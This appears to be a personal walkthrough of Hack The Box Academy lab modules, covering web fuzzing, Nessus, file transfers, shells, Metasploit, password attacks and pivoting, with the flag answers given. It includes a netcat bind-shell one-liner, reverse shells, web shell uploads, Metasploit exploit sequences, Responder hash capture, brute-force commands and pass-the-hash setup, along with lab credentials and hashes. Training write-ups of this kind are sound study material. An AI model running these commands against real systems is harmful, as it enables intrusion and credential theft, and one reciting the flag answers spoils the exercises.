ffuf -recursion -recursion-depth 1 -u http://web1337.inlanefreight.htb:53178/admin_h1dd3n/FUZZ -w /usr/share/seclists//Discovery/Web-Content/common.txt
# 7. There is one result: index.html. Go to http://web1337.inlanefreight.htb:$port/admin_h1dd3n/index.html to retrieve the flag.
Results: e963d863ee0e82ba7080fbf558ca0d3f
After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.
# 1. Following the previous question, additional vhost discovery could be done:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://inlanefreight.htb:$port -H "HOST:FUZZ.web1337.inlanefreight.htb" -fs 120
# Add the second discovered VHOST (`dev`) to /etc/host, and visit the site http://dev.web1337.inlanefreight.htb/index.html. Notice that there is a next button, that takes you to a http://dev.web1337.inlanefreight.htb/index-123.html. Set-up an intruder attack with Numbered payload
Results: 1337testing@inlanefreight.htb
What is the API key the inlanefreight.htb developers will be changing too?
Results: ba988b835be4aa97d068941dc852ff33
Vulnerability Assessment
Nesus
Nessus Skills assessment
What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word)
Authenticate to port 22 with user "htb-student" and password "HTB_@cademy_student!". Start nessus and go to the IP:8834 url. Have a look at the windows scan.
Results: wsus
What was the target for the authenticated scan?
Results: 172.16.16.100
What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan?
Results: 156032
What is the name of the vulnerability with plugin ID 26925 from the Windows authenticated scan? (Case sensitive)
Results: VNC Server Unauthenticated Access
What port is the VNC server running on in the authenticated Windows scan?
Results: 5900
Openvass
Openvass Skills assessment
What type of operating system is the Linux host running? (one word)
Results: Ubuntu
What type of FTP vulnerability is on the Linux host? (Case Sensitive, four words)
Results: Anonymous FTP Login Reporting
What is the IP of the Linux host targeted for the scan?
Results: 172.16.16.160
What vulnerability is associated with the HTTP server? (Case-sensitive)
Results: Cleartext Transmission of Sensitive Information via HTTP
File Transfers
Windows File Transfer methods
Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer.
Results: b1a4ca918282fcd96004565521944a3b
RDP to 10.129.201.55 (ACADEMY-MISC-MS02) with user "htb-student" and password "HTB_@cademy_stdnt!". Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
# First download the file to your kali. Second, run a server, for instance this PHP server
sudo php -S 0.0.0.0:80
# Launch a RDP connection
xfreerdp /cert:ignore /u:$user /p:$pass /v:$ip
# In the windows machine, open Powershell and retrieve the file:
(New-Object Net.WebClient).DownloadFile('http://$ip/upload_win.zip','C:\Users\htb-student\Desktop\upload_win.zip')
# Unzip it in the Desktop. Open cmd and run:
hasher C:\Users\htb-student\Desktop\upload_win\upload_win.txt
Results: f458303ea783c224c6b4e7ef7f17eb9d
Linux File Transfer methods
Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.
Results: 5d21cf3da9c0ccb94f709e2559f3ea50
SSH to 10.129.206.169 (ACADEMY-MISC-NIX04) with user "htb-student" and password "HTB_@cademy_stdnt!". Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>
" from the command line. Submit the generated hash as your answer.
scp upload_nix.zip htb-student@$ip:/tmp
# Enter the htb-student password
# Unzip file
python3 -m zipfile -e upload_nix.zip .
# Or
gunzip -S .zip upload_nix.zip
# hash it
hasher upload_nix.txt
Results: 159cfe5c65054bbadb2761cfa359c8b0
Shells & Payloads
Shell Basics
Which two shell languages did we experiment with in this section? (Format: shellname&shellname)
Results: bash&powershell
In Pwnbox issue the $PSversiontable variable using PowerShell. Submit the edition of PowerShell that is running as the answer. Results: Core
Des is able to issue the command nc -lvnp 443 on a Linux target. What port will she need to connect to from her attack box to successfully establish a shell session?
Results: 443
SSH to $ipVictim with user "htb-student" and password "HTB_@cademy_stdnt!". Create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts.
# Connect via ssh with victim's machine. In the attacker machine:
ssh htb-student@$ipVictim
# enter password. Now, in the same terminal set the listener:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l $ipVictim $port > /tmp/f
# In the attacker terminal:
nc $ipVictim $port
cat /customscripts/flag.txt
Results: B1nD_Shells_r_cool
When establishing a reverse shell session with a target, will the target act as a client or server? Results: Client
Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box.
Results: Shells-Win10
Payloads
What command language interpreter is used to establish a system shell session with the target?
Results: powershell
Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. (Format: filename.extension)
msfconsole -q
use exploit/windows/smb/psexec
show info
set RHOSTS ...
set LHOST ...
set SMBPass HTB_@cademy_stdnt!
set SMBUser htb-student
set SMBSHARE ADMIN$
run
dir C:\Users\htb-student\Documents>
Results: staffsalaries.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54:::
Windows Shells
What file type is a text-based DOS script used to perform tasks from the cli? (answer with the file extension, e.g. '.something')
Results: .bat
What Windows exploit was dropped as a part of the Shadow Brokers leak? (Format: ms bulletin number, e.g. MSxx-xxx)
Results: MS17-010
*Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:*
sudo nmap -sC -sV -O $ip -Pn
msfconsole -q
search MS17-010
use windows/smb/ms17_010_psexec
set RHOSTS...
set SHARE ADMIN$
set LHOST
run
Results: EB-Still-W0rk$
NIX Shells
What language is the payload written in that gets uploaded when executing rconfig_vendors_auth_file_upload_rce?
Results: php
Exploit the target and find the hostname of the router in the devicedetails directory at the root of the file system.
sudo nmap -sC -sV -v $ip -Pn
# Enter ip in the browser and discover rConfig Version 3.9.6
msfconsole -q
search rConfig
use linux/http/rconfig_vendors_auth_file_upload_rce
set RHOSTS
set LHOST
run
ls -la /devicedetails
cat /devicedetails/hostnameinfo.txt
cat /devicedetails/edgerouter-isp.yml
Results: edgerouter-isp
Web Shells
laudanum
vHosts needed for these questions: status.inlanefreight.local
Establish a web shell session with the target using the concepts covered in this section. Submit the full path of the directory you land in. (Format: c:\path\you\land\in)
sudo nmap -sC -sV $ip
# Add "$ip status.inlanefreight.local" to /etc/hosts
# browse to status.inlanefreight.local
# Infer that aspx is in use.
# Notice the upload file feature by the end of the page
# Copy the file you want to use from laudanum repo to where you want to use it from:
cp /usr/share/laudanum/aspx/shell.aspx /your/path/laudanum.aspx
# In this case I'm selecting an aspx shell. There are other types.
Modify the shell to use. Add to the whitelisting rule your ip.
Upload the file to the web server.
Once uploaded, go to http://status.inlanefreight.local//file/laudanum.aspx which is your uploaded file. You will see something like:
Results: c:\windows\system32\inetsrv
Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)
Results: /usr/share/laudanum/aspx/shell.aspx
antak webshell
vHosts needed for these questions: status.inlanefreight.local
. Where is the Antak webshell located on Pwnbox? Submit the full path. (Format:/path/to/antakwebshell)
Results: /usr/share/nishang/Antak-WebShell/antak.aspx
Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: *, 1 space)*
# First step, generate the file you will upload:
sudo cp /usr/share/nishang/Antak-WebShell/antak.aspx /path/Upload.aspx
Set credentials for access to the web shell. Modify line 14
, adding a user and password.
Open the browser and upload the file to the web app. Open the url //files/Upload.aspx and enter user and password.
Now that we have access, we can utilize PowerShell commands to navigate and take actions against the host.
Results: iis apppool\status
php shells
In the example shown, what must the Content-Type be changed to in order to successfully upload the web shell? (Format: .../...)
Results: image/gif
Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)
# Access the site and enter credentials admin:admin
# Go to devices > vendor
# Intercept the uploading of the logo
# Use https://www.revshells.com/ -> PHP Ivan Sincek
# Modifify the file to contain attacker ip and port
# Upload it. Bypass content-type. Leave image/gif. Leave in the intercepted payload the PHP extensionin filename.
# Set a netcat listener
nc -lnvp 1234
# Trigger the uploaded file from https://$ip/images/vendor/nameOfUploadedFile.php
# You will get the reverse shell. List files
ls -la
Results: ajax-loader.gif
Skills Assessment
CAT5's team has secured a foothold into Inlanefrieght's network for us. Our responsibility is to examine the results from the recon that was run, validate any info we deem necessary, research what can be seen, and choose which exploit, payloads, and shells will be used to control the targets. Once on the VPN or from your Pwnbox
, we will need to RDP
into the foothold host and perform any required actions from there. Below you will find any credentials, IP addresses, and other info that may be required.
Hosts 1-3 will be your targets for this skills challenge. Each host has a unique vector to attack and may even have more than one route built-in. The challenge questions below can be answered by exploiting these three hosts. Gain access and enumerate these targets. You will need to utilize the Foothold PC provided. The IP will appear when you spawn the targets. Attempting to interact with the targets from anywhere other than the foothold will not work. Keep in mind that the Foothold host has access to the Internal inlanefreight network (172.16.1.0/23
network) so you may want to pay careful attention to the IP address you pick when starting your listeners.
10.129.213.83
What is the hostname of Host-1? (Format: all lower case)
# Connect to the parrot machine
xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!
# Open a terminal and scan ip range 172.16.1.0/23
nmap 172.16.1.0/23
# Three host identified: .11, .12, and .13. Host-1 is .11. Perform a nmap scan on open ports:
sudo nmap -sC -sV 172.16.1.11 -p80,135,139,445,515,1801,2103,2105,2107,3389,8080
# The hostname is displayed
Results: SHELLS-WINSVR
Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)
# The Parrot machine has on Desktop a file called access-creds.txt. It contains several useful creds, such as those of Tomcat service.
# One of the services listed in the nmap scanner in Apache Tomcat 10.0.11 running on 8080. We will exploit that one:
msfconsole -q
search tomcat
use multi/http/tomcat_mgr_upload
set RHOSTS 172.16.1.11
set RPORT 8080
set target Windows Universal
set payload payload/generic/shell_reverse_tcp
# After gaining access, go to c:\Shares
dir
Results: dev-share
What distribution of Linux is running on Host-2? (Format: distro name, all lower case)
Results: Ubuntu
What language is the shell written in that gets uploaded when using the 50064.rb exploit?
Results: php
Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt
# Open firefox writting in the terminal
firefox
# Open the blog in scope http://blog.inlinefreight.local and click on login
# Enter the creds from the access-creds.txt file: admin:admin123!@#
# The new interface allows you to upload certain contents. Open Burpsuite and intercept communications. Also, observe the content of the site. There is a link to https://www.exploit-db.com/exploits/50064 about Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)
# Open a terminal on the Parrot:
searchsploit Lightweight
# You will see
Lightweight facebook-styled blog 1.3 - Remote | php/webapps/50064.rb
# Print the path
searchsploit -m php/webapps/50064.rb
# Create the folders
sudo mkdir /usr/share/metasploit-framework/modules/exploits/php/
sudo mkdir /usr/share/metasploit-framework/modules/exploits/php/webapps/
# Copy the exploit
sudo cp 50064.rb mkdir /usr/share/metasploit-framework/modules/exploits/php/webapps/
# Reload all modules
reload_all
# Now when searching for Lightweight, we could access the exploit
search Lightweight
use exploit/php/webapps/50064
options
set RHOSTS 172.16.1.12
set TARGETURI /
set VHOST blog.inlanefreight.local
set USERNAME admin
set PASSWORD admin123!@#
run
cat /customscripts/flag.txt
Results: B1nD_Shells_r_cool
What is the hostname of Host-3?
Results: SHELLS-WINBLUE
Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt
msfconsole -q
use exploit/windows/smb/ms17_010_psexec
SET RHOSTS 172.16.1.13
SET LHOST 172.16.1.5
run
shell
type C:\Users\Administrator\Desktop\Skills-flag.txt
Results: One-H0st-Down!
Using the Metasploit Framework
Introduction to Metasploit
Which version of Metasploit comes equipped with a GUI interface?
Results: Metasploit Pro
What command do you use to interact with the free version of Metasploit?
Results: msfconsole
MSF Components
Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer.
msfconsole -q
search EternalRomance
use exploit/windows/smb/ms17_010_psexec
#set options, run, and obtain a meterpreter
shell
type C:/Users/Administrator/Desktop/flag.txt
Results: HTB{MSF-W1nD0w5-3xPL01t4t10n}
Exploit the Apache Druid service and find the flag.txt file. Submit the contents of this file as the answer.
# From results you have
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
| 256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_ 256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
8081/tcp open http Jetty 9.4.12.v20180830
| http-title: Apache Druid
|_Requested resource was http://10.129.203.52:8081/unified-console.html
|_http-server-header: Jetty(9.4.12.v20180830)
8082/tcp open http Jetty 9.4.12.v20180830
|_http-title: Site doesn't have a title.
|_http-server-header: Jetty(9.4.12.v20180830)
8083/tcp open http Jetty 9.4.12.v20180830
|_http-server-header: Jetty(9.4.12.v20180830)
|_http-title: Site doesn't have a title.
8888/tcp open http Jetty 9.4.12.v20180830
|_http-server-header: Jetty(9.4.12.v20180830)
| http-title: Apache Druid
|_Requested resource was http://10.129.203.52:8888/unified-console.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# Now
msfconsole -q
search apache druid
use linux/http/apache_druid_js_rce
# set RHOSTS, LHOST, etc and run it to obtain a meterpreter
shell
pwd
cd ..
cat flag.txt
Results: HTB{MSF_Expl01t4t10n}
MSF Sessions
The target has a specific web application running that we can find by looking into the HTML source code. What is the name of that web application?
Results: elFinder
Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?
msfconsole -q
workspace -a lala
db_nmap -sC -sV $ip
search elfinder
use linux/http/elfinder_archive_cmd_injection
# SET RHOSTS, SET LHOST...
run
getuid
Results: www-data
The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer.
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
After searching in google, we find CVE-2021-3156:
Results: HTB{5e55ion5_4r3_sw33t}
Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?
From response pay attention to port 5000:
Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds?
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Services
[*] Nmap: |_ssl-date: 2024-09-23T19:38:10+00:00; 0s from scanner time.
[*] Nmap: | ssl-cert: Subject: commonName=WIN-51BJ97BCIPV
[*] Nmap: | Not valid before: 2024-09-22T19:35:32
[*] Nmap: |_Not valid after: 2025-03-24T19:35:32
[*] Nmap: | rdp-ntlm-info:
[*] Nmap: | Target_Name: WIN-51BJ97BCIPV
[*] Nmap: | NetBIOS_Domain_Name: WIN-51BJ97BCIPV
[*] Nmap: | NetBIOS_Computer_Name: WIN-51BJ97BCIPV
[*] Nmap: | DNS_Domain_Name: WIN-51BJ97BCIPV
[*] Nmap: | DNS_Computer_Name: WIN-51BJ97BCIPV
[*] Nmap: | Product_Version: 10.0.17763
[*] Nmap: |_ System_Time: 2024-09-23T19:38:02+00:00
[*] Nmap: 5000/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: | http-methods:
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: |_http-server-header: Microsoft-IIS/10.0
[*] Nmap: |_http-title: FortiLogger | Log and Report System
[*] Nmap: 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: |_http-title: Not Found
[*] Nmap: |_http-server-header: Microsoft-HTTPAPI/2.0
[*] Nmap: 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: |_http-server-header: Microsoft-HTTPAPI/2.0
[*] Nmap: |_http-title: Not Found
[*] Nmap: 49664/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49665/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49666/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49667/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49668/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49669/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49670/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49671/tcp open msrpc Microsoft Windows RPC
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb2-time:
[*] Nmap: | date: 2024-09-23T19:38:06
[*] Nmap: |_ start_date: N/A
[*] Nmap: | smb2-security-mode:
[*] Nmap: | 3:1:1:
[*] Nmap: |_ Message signing enabled but not required
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
After visiting $ip:5000 you can see the Fortilogger service.
search fortilogger
use exploit/windows/http/fortilogger_arbitrary_fileupload
# SET LHOST, RHOSTS...
run
getuid
Results: NT AUTHORITY\SYSTEM
Retrieve the NTLM password hash for the "htb-student" user. Submit the hash as the answer.
... CUT ...
RID : 000003ea (1002)
User : htb-student
Hash NTLM: cf3a5525ee9414229e66279623ed5c58
... CUT ...
Results: cf3a5525ee9414229e66279623ed5c58
Password Attacks
Attacking Common Services
FTP
What port is the FTP service running on?
Results: 2121
What username is available for the FTP server?
# Footprint the service and check out that anonymous user is enabled. Login into the ftp service and download the userlist and password list. After that...
# Two ways:
medusa -U users.list -P pws.list -h $ip -M ftp -n 2121
hydra -L users.list -P pws.list ftp://$ip:2121
Results: robin
Use the discovered username with its password to login via SSH and obtain the flag.txt file. Submit the contents as your answer.
Results: HTB{ATT4CK1NG_F7P_53RV1C3}
SMB
What is the name of the shared folder with READ permissions?
Results: GGJ
What is the password for the username "jason"?
sudo nmap -sC -sV $ip -Pn
# Results 22,53, 139,445,2121
ftp $ip 2121
# Enter anonymous and anonymous
# Download files
mget *.list
# Checksmb services
smbmap -H //
smbclient //$ip/GGJ -N
smbclient //$ip/GGJ -N -r
# However, downloading the id_rsa file is not possible due to permissions.
smbmap -H $ip --download GGJ/id_rsa //NOT WORKING
# We will download from resources pwd.list and launch a brute for attack
crackmapexec smb $ip -u jason -p pws.list -d ATTCSVC-LINUX
Results: 34c8zuNBo91!@28Bszh
Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.
# Log in as jason
smbclient //$ip/GGJ -U jason
#Enter password
get id_rsa
quit
chmod 600 id_rsa
ssh -i id_rsa jason@$ip
cat flag.txt
Results: HTB{SMB_4TT4CKS_2349872359}
SQL Databases
Authenticate to $ip with user "htbdbuser" and password "MSSQLAccess01!"
What is the password for the "mssqlsvc" user?
# Connect to the db using mssqlclient impacket
mssqlclient.py -p 1433 htbdbuser@$ip
# Enter creds when prompted
# Whoami
select user_name();
# List users:
SELECT name FROM master..syslogins
# The one we are looking for is not present.
# We will try to capture MSSQL Service Hash by using `xp_dirtree` undocumented stored procedures.
# In our attacker machine open a new terminal and set a responder listener
sudo responder -I tun0
# In the already connected mssql command line:
EXEC master..xp_dirtree '\\$ipAttacker\share'
# The responder listener will print:
NTLMv2-SSP Hash : mssqlsvc::WIN-02:5b55e0dc6b4e012d:9061B752E27B9DC08B778088A813DDF6:0101000000000000801A85C76927DB01E0A642B53DA7BF6000000000020008004A00420059004F0001001E00570049004E002D0037003500460059004F0055004F00540052004F00360004003400570049004E002D0037003500460059004F0055004F00540052004F0036002E004A00420059004F002E004C004F00430041004C00030014004A00420059004F002E004C004F00430041004C00050014004A00420059004F002E004C004F00430041004C0007000800801A85C76927DB0106000400020000000800300030000000000000000000000000300000ABE564474E572C0FDA65F14FE47C49910CF6D5E2D84E98065E4910B32B2B9D850A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00380034000000000000000000
# Let's save it to a file
echo "mssqlsvc::WIN-02:5b55e0dc6b4e012d:9061B752E27B9DC08B778088A813DDF6:0101000000000000801A85C76927DB01E0A642B53DA7BF6000000000020008004A00420059004F0001001E00570049004E002D0037003500460059004F0055004F00540052004F00360004003400570049004E002D0037003500460059004F0055004F00540052004F0036002E004A00420059004F002E004C004F00430041004C00030014004A00420059004F002E004C004F00430041004C00050014004A00420059004F002E004C004F00430041004C0007000800801A85C76927DB0106000400020000000800300030000000000000000000000000300000ABE564474E572C0FDA65F14FE47C49910CF6D5E2D84E98065E4910B32B2B9D850A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00380034000000000000000000" > hash.txt
# And now... crack it with John the ripper
john -w=/usr/share/wordlists/rockyou.txt hash.txt
```
Results: princess1
**Enumerate the "flagDB" database and submit a flag as your answer.**
We know that user mssqlsvc:princess1 is part of the windows authentication, so we login into the service with those creds:
mssqlclient.py -p 1433 mssqlsvc@$ip -windows-auth
and enter the password
List databases
SELECT name FROM master.dbo.sysdatabases
Let's see tables in flagDB
SELECT table_name FROM flagDB.INFORMATION_SCHEMA.TABLES
Ok, we need to select the DB before asking for its contents
USE flagDB
Now print the content of the table:
SELECT * FROM tb_flag
Results: HTB{!_l0v3_#4$#!n9_4nd_r3$p0nd3r}
### RDP
RDP to with user "htb-rdp" and password "HTBRocks!"
**What is the name of the file that was left on the Desktop? (Format example: filename.txt).**
Results: pentest-notes.txt
**Which registry key needs to be changed to allow Pass-the-Hash with the RDP protocol?**
Reading the file pentest-notes.txt
User: Administrator Hash: 0E14B9D6330BF16C30B1924111104824
Which means that RDP connection with pass the hash needs some troubleshooting.
*Restricted Admin Mode*, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key `DisableRestrictedAdmin` (REG_DWORD) under `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa` with the value of 0. It can be done using the following command:
```powershell
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Results: DisableRestrictedAdmin
Connect via RDP with the Administrator account and submit the flag.txt as you answer.
Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.
Results: HTB{RDP_P4$$_Th3_H4$#}
DNS
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
# Enumerate subdomains
dnsenum --dnsserver 10.129.86.251 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
# you will get the following subdomains:
# ns.inlanefreight.htb, control.inlanefreight.htb, helpdesk.inlanefreight.htb
# Install subbrute
git clone https://github.com/TheRook/subbrute.git >> /dev/null 2>&1
# Access the tool
cd subbrute
# Configure resolver file
echo "ns.inlanefreight.htb" > ./resolvers.txt
# Enumerate subdomains with subbrute
python3 subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
# You will get the following subdomains:
# hr.inlanefreight.htb
# Attempt a zone transfer
dig AXFR @ns.inlanefreight.htb hr.inlanefreight.htb
; <<>> DiG 9.19.21-1-Debian <<>> AXFR @ns.inlanefreight.htb hr.inlanefreight.htb
; (1 server found)
;; global options: +cmd
hr.inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
hr.inlanefreight.htb. 604800 IN TXT "HTB{LUIHNFAS2871SJK1259991}"
hr.inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
ns.hr.inlanefreight.htb. 604800 IN A 127.0.0.1
hr.inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.129.86.251#53(ns.inlanefreight.htb) (TCP)
;; WHEN: Fri Nov 01 14:34:47 EDT 2024
;; XFR size: 5 records (messages 1, bytes 230)
Results: HTB{LUIHNFAS2871SJK1259991}
SMTP
What is the available username for the domain inlanefreight.htb in the SMTP server?
Results: marlin
Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.
hydra -l marlin@inlanefreight.htb -P passwords.list -f $ip pop3
# It will return the password: poohbear
# Now connect to POP server
telnet $ip 110
USER marlin@inlanefreight.htb
PASS poohbear
STATS
LIST
RETR 1
Results: HTB{w34k_p4$$w0rd}
Skills Assessment
We were commissioned by the company Inlanefreight to conduct a penetration test against three different hosts to check the servers' configuration and security. We were informed that a flag had been placed somewhere on each server to prove successful access. These flags have the following format: - HTB{...}
. Our task is to review the security of each of the three servers and present it to the customer. According to our information, the first server is a server that manages emails, customers, and their files.
EASY. You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
sudo nmap -sC -sV -Pn $ip
echo "$ip inlanefreight.htb" | sudo tee -a /etc/host
# Download the users.list from HTB or you will go bananas
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t $ip
# As a result you get fiona@inlanefreight.htb exists
# Password attack
hydra -l fiona@inlanefreight.htb -P passwords.list -t 64 -f $ip smtp
# Result: [25][smtp] host: 10.129.179.42 login: fiona@inlanefreight.htb password: 987654321
# Now we login into the service mysql
mysql -u fiona -p"987654321" -h $ip
SELECT LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt");
Results: HTB{t#3r3_4r3_tw0_w4y$_t0_93t_t#3_fl49}
The second server is an internal server (within the inlanefreight.htb
domain) that manages and stores emails and files and serves as a backup of some of the company's processes. From internal conversations, we heard that this is used relatively rarely and, in most cases, has only been used for testing purposes so far.
MEDIUM: Assess the target server and find the flag.txt file. Submit the contents of this file as your answer.
sudo nmap -sC -sV -Pn -p- $ip
ftp $ip 30021
# Enter as creds anonymous:anonymous
# dir
# cd simon
# mget *.txt
# quit
ssh simon@$ip
# Enter password 8Ns8j1b!23hs4921smHzwn
cat flag.txt
Results: HTB{1qay2wsx3EDC4rfv_M3D1UM}
Hard. The third server is another internal server used to manage files and working material, such as forms. In addition, a database is used on the server, the purpose of which we do not know.
What file can you retrieve that belongs to the user "simon"? (Format: filename.txt)
Results: random.txt
Enumerate the target and find a password for the user Fiona. What is her password?
smbclient -L \\$ip -U simon
smbclient \\\\$ip\\Home -U simon -N
cd IT
cd Fiona
get creds.txt
quit
cat creds.txt
#Try with all creds and see that "48Ns72!bns74@S84NNNSl" works for:
smbclient \\\\$ip\\Home -U fiona
Results: 48Ns72!bns74@S84NNNSl
Once logged in, what other user can we compromise to gain admin privileges?
Results: John
Submit the contents of the flag.txt file on the Administrator Desktop.
rdesktop -u Fiona -p '48Ns72!bns74@S84NNNSl' $ip
# Open Powershell
sqlcmd
# List databases
1> SELECT name FROM master.dbo.sysdatabases
2> go
# Enumerate DB and nothing interesting comes out
# Verify if our current user has the sysadmin role:
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
go
# value 0 indicates no sysadmin role, value 1 is sysadmin role. Fiona has no sysadminrole
# Identify Users that we Can Impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
go
# As a result we can see john. Let's impersonate him and verify if hjohn has sysadmin role
EXECUTE AS LOGIN = 'john';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
go
# No sysadmin role for john
# Identify linked Servers in MSSQL
SELECT srvname, isremote FROM sysservers
go
# As response we have
# WINSRV02\SQLEXPRESS # LOCAL.TEST.LINKED.SRV
# We can read files from that connection in local
execute ('select * from OPENROWSET(BULK ''C:/Users/Administrator/desktop/flag.txt'', SINGLE_CLOB) AS Contents') at [local.test.linked.srv];
Results: HTB{46u$!n9_l!nk3d_$3rv3r$}
Pivoting, Tunneling, and Port Forwarding
Introduction
Reference the Using ifconfig output in the section reading. Which NIC is assigned a public IP address?
Results: eth0
Reference the Routing Table on Pwnbox output shown in the section reading. If a packet is destined for a host with the IP address of 10.129.10.25, out of which NIC will the packet be forwarded?
Results: tun0
Reference the Routing Table on Pwnbox output shown in the section reading. If a packet is destined for www.hackthebox.com what is the IP address of the gateway it will be sent to?
Results: 178.62.64.1
Choosing The Dig Site & Starting Our Tunnels
SSH to $ip with user "ubuntu" and password "HTB_@cademy_stdnt!" You have successfully captured credentials to an external facing Web Server. Connect to the target and list the network interfaces. How many network interfaces does the target web server have? (Including the loopback interface)
Results: 3
Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.
# Configure proxychains.
sudo nano /etc/proxychains4.conf
# Adding the last line: socks5 127.0.0.1 1234
# Set the dynamic port:
ssh ubuntu@$ip -D 1234
# Scan the NIC in the connection
ip a
# Open a different terminal and run a nmap on the network range to discover ips (another network) from the victim's
proxychains nmap -v -sT -Pn 172.16.5.1-255
# In the results you will see 172.16.5.19. Now run a nmap on that ip
proxychains nmap -v -sT -Pn 172.16.5.19
# Open ports:
# 53/tcp open domain
# 80/tcp open http
# 88/tcp open kerberos-sec
# 135/tcp open msrpc
# 139/tcp open netbios-ssn
# 389/tcp open ldap
# 445/tcp open microsoft-ds
# 464/tcp open kpasswd5
# 593/tcp open http-rpc-epmap
# 636/tcp open ldapssl
# 3268/tcp open globalcatLDAP
# 3269/tcp open globalcatLDAPssl
# 3389/tcp open ms-wbt-server
# In a different terminal
export user="victor"
export pass="pass@123"
proxychains xfreerdp /u:$user /p:$pass /v:172.16.5.19
# And you will get a RDP connection. Open the flag.txt
Results: N1c3Piv0t
